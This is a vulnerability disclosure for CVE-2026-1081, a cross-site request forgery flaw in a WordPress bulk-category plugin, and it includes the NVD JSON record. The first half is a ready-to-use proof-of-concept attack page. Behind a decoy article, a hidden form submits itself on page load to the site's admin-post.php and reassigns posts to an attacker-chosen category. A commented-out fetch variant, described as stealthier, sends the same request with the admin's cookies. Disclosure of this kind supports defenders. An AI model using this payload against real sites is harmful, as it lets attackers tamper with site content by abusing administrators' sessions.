CVE-2026-1081

<!-- CSRF PoC for CVE-2026-1081 --> <!-- This PoC demonstrates how an attacker can trick a WordPress admin into changing post categories --> <!DOCTYPE html> <html> <head> <title>Category Update PoC</title> </head> <body> <h1>Interesting Article</h1> <p>Click here to read more: <a href="http://malicious-site.com/page">Read More</a></p> <!-- Hidden CSRF form that auto-submits --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="set_bulk_categories"> <input type="hidden" name="post_ids" value="1,2,3"> <input type="hidden" name="categories" value="malicious-category"> <input type="hidden" name="remove_cats" value="1"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Alternative: Use fetch API for more stealthy attack /* fetch('http://target-site.com/wp-admin/admin-post.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=set_bulk_categories&post_ids=1,2,3&categories=malicious-category&remove_cats=1' }); */ </script> <p>If you see this message, the attack has been executed.</p> </body> </html>

{"cve": {"id": "CVE-2026-1081", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:08.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Set Bulk Post Categories plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the bulk category update functionality. This makes it possible for unauthenticated attackers to modify post categories in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Set Bulk Post Categories para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.1, inclusive. Esto se debe a la falta de validación de nonce en la funcionalidad de actualización masiva de categorías. Esto hace posible que atacantes no autenticados modifiquen categorías de entradas de forma masiva a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/tags/1.1/set-bulk-categories.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/trunk/set-bulk-categories.php#L36", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9503f908-ead2-4c34-89b9-1e2348b90f3c?source=cve", "source": "[email protected]"}]}}